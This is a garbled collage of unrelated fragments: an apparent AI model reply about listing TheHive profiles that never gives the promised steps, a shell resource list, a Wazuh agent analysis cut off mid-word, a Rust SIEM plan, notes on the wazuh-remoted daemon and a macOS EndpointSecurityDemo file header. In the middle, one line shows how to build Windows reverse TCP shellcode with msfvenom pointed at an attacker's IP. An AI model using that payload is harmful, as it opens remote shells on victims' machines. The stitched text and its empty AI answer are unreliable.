Gerfect! I found the profile API endpoints. The error you're seeing (/api/v1/profile returns NotFoundError) is because there's no direct GET endpoint for listing profiles in v1. However, I can see from the routing that profiles can be accessed. Let me explain how to list all profiles:
How to List All Profiles in TheHive
Based on the codebase analysis, here are the ways to list profiles:
| osquery-wazuh.sh.x.c | |
| osq |
| # GNU/Linux Resource List | |
| ##### Shells | |
| ✅ <a href="https://www.gnu.org/software/bash/"><b>GNU Bash</b></a> - is an sh-compatible shell that incorporates useful features from the Korn shell and C shell.<br> | |
| ✅ <a href="https://www.zsh.org/"><b>Zsh</b></a> - is a shell designed for interactive use, although it is also a powerful scripting language.<br> | |
| ✅ <a href="https://tcl-lang.org/"><b>tclsh</b></a> - is a very powerful cross-platform shell, suitable for a huge range of uses.<br> | |
| ✅ <a href="https://github.com/Bash-it/bash-it"><b>bash-it</b></a> - is a framework for using, developing and maintaining shell scripts and custom commands.<br> |
Wazuh agents provide enterprise-grade, multi-platform security monitoring with sophisticated log collection, parsing, and forwarding capabilities designed for XDR/OXDR platforms. This analysis reveals that Wazuh employs a modular architecture capable of processing 50,000+ events per second while maintaining minimal system overhead (35MB RAM average) and AES-256 encrypted communications. The platform's open-source nature, combined with extensive SIEM integration capabilities and MITRE ATT&CK framework alignment, positions it as a viable alternative to commercial endpoint detection solutions.
Wazuh implements a distributed, modular agent architecture where specialized daemons handle distinct security monitoring functions. The core logging subsystem centers around the wazuh-logcollector daemon, which operates through multiple collection engines supporting diverse log formats and sour
A comprehensive security monitoring solution leveraging Rust's memory safety and performance for enterprise-grade threat detection across Windows, macOS, and Linux environments.
This plan outlines the development and deployment of a next-generation Security Information and Event Management (SIEM) platform built on Rust-based technologies. The solution provides unified threat detection, incident response, and forensic analysis capabilities across heterogeneous environments while maintaining security-by-design principles.
Key Differentiators:
The wazuh-remoted daemon is the core server-side component that manages agent communication and status. It handles the agent keepalive mechanism and updates agent status using the wdb_update_agent_keepalive(agent_id, AGENT_CS_ACTIVE, ...) function.
Location: The remoted daemon runs by default as the wazuh user and is chrooted to /var/ossec.
Use msfvenom to create shellcode for a reverse TCP shell. Replace YOUR_IP with your attacker's IP address and YOUR_PORT with the desired port number:
msfvenom -p windows/x64/shell_reverse_tcp LHOST=YOUR_IP LPORT=YOUR_PORT -f csharp
| // | |
| // main.m | |
| // EndpointSecurityDemo | |
| // | |
| // Created by Omar Ikram on 17/06/2019 - macOS Catalina 10.15 Beta 1 (19A471t) | |
| // Updated by Omar Ikram on 15/08/2019 - macOS Catalina 10.15 Beta 5 (19A526h) | |
| // Updated by Omar Ikram on 01/12/2019 - macOS Catalina 10.15 (19A583) | |
| // Updated by Omar Ikram on 31/01/2021 - macOS Big Sur 11.1 (20C69) | |
| // Updated by Omar Ikram on 07/05/2021 - macOS Big Sur 11.3.1 (20E241) | |
| // Updated by Omar Ikram on 04/07/2021 - macOS Monterey 12 Beta 2 (21A5268h) |